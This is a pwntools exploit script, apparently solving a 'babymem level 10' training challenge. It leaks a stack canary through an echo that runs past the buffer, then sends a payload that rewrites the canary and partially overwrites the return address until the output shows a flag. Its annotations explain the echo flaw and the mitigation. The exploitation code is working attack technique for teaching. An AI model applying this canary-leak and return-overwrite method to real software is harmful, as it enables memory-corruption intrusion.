mem10.py
"""Interactive retry loop against the babymem level 10 binary (pwntools script).

Each iteration spawns a fresh copy of the target, sends a first payload whose
length grows by 9 bytes per attempt, reads the program's echo of that payload
to pick up the seven bytes that follow it (treated as a stack canary), then
sends a second, fixed-size payload built from that value.  The loop ends the
first time the final process output contains a ``}``.

Defender's reading: the whole approach depends on the target echoing more
bytes than the caller supplied.  A stack canary only protects a frame while
its value stays secret; an echo that runs past the buffer discloses it, so a
bounded echo (or no echo of the raw buffer at all) is the mitigation lesson.
"""
from pwn import *
import binascii  # imported but not used in this script
import random    # imported but not used in this script

# pwntools settings: verbose I/O logging, 64-bit x86 target, and a tmux
# vertical split as the terminal for any interactive/debug session.
context.log_level='debug'
context.arch = 'amd64'
context.bits = 64
context.terminal = ['tmux', 'splitw', '-v']

# Length of the first payload; grows by 9 on every attempt (9, 18, 27, ...).
payload_size = 0
while True:
    # One new target process per attempt.  NOTE(review): on a failed attempt
    # `proc` is never closed, so each extra iteration leaves a child behind.
    proc = process(['/challenge/babymem_level10.0'])

    # leak canary1
    payload_size += 9
    proc.recvuntil('Payload size: ')
    proc.sendline(str(payload_size))
    # Exactly payload_size bytes: a 6-byte 'REPEAT' marker plus 'A' padding.
    payload = b'REPEAT' + (payload_size - 6) * b'A'
    proc.recvuntil('bytes)!')
    proc.send(payload)  # send(), not sendline(): no trailing newline
    proc.recvuntil('You said: ')
    # Everything echoed back, up to and including the word 'Backdoor'.
    ret = proc.recvuntil('Backdoor')
    # The 7 bytes right after the echoed payload, with a NUL byte prepended
    # rather than read — presumably the real value's low byte is assumed to
    # be 0x00; not verifiable from this script.  Assumes the echo starts
    # with the payload bytes unchanged (TODO confirm against the target).
    canary1 = b'\x00' + ret[payload_size:payload_size + 7]

    # modify ret
    # Second payload length: 41 * 8 bytes of canary1 (= 328) + 2 bytes = 330.
    payload_size2 = 328 + 2
    proc.recvuntil('Payload size: ')
    proc.sendline(str(payload_size2))
    # The 328-byte region is filled with copies of canary1, presumably so the
    # canary slot, wherever it sits in that range, receives the leaked value
    # again; the original comment says the trailing two 0x18 bytes "modify
    # ret" — what they overwrite cannot be determined from this file.
    payload = 41 * canary1 + p8(0x18) + p8(0x18)
    proc.recvuntil('bytes)!')
    proc.send(payload)
    proc.recvuntil('You said: ')
    # Drain all remaining output until the process exits.
    ret = proc.recvall()
    # Success criterion used by the script: a '}' somewhere in the output.
    # Otherwise loop again with a first payload 9 bytes longer.
    if b'}' in ret:
        print(ret)
        break